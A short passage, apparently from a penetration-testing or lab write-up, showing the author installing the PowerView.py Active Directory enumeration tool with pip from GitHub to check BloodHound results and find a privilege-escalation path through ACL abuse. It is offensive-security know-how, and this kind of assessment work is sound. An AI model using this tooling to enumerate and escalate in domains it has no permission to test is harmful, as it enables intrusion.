With the environment active, I installed PowerView.py directly from its GitHub repository so I could use the latest version and its bundled AD tooling:
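Inside the activated environment, the install is a single pip command pointed at the project's repository (assuming the commonly used `aniqfakhrul/powerview.py` fork; adjust the URL if you use a different one):

```shell
# Install PowerView.py straight from GitHub so pip resolves the
# latest commit and pulls in ldap3, impacket, and other dependencies
pip install git+https://github.com/aniqfakhrul/powerview.py
```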
The output shows pip cloning the repository, resolving it to a specific commit, and pulling in the dependencies required for Active Directory interaction. This includes libraries such as ldap3 and impacket for LDAP/Kerberos/SMB support, plus additional packages used for parsing, formatting, and authentication workflows.
Once installation completed successfully, my PowerView environment was ready. At this stage, I had a reliable toolkit to enumerate AD objects and permissions interactively, which I could use to validate BloodHound findings and identify the cleanest escalation path based on ACL abuse.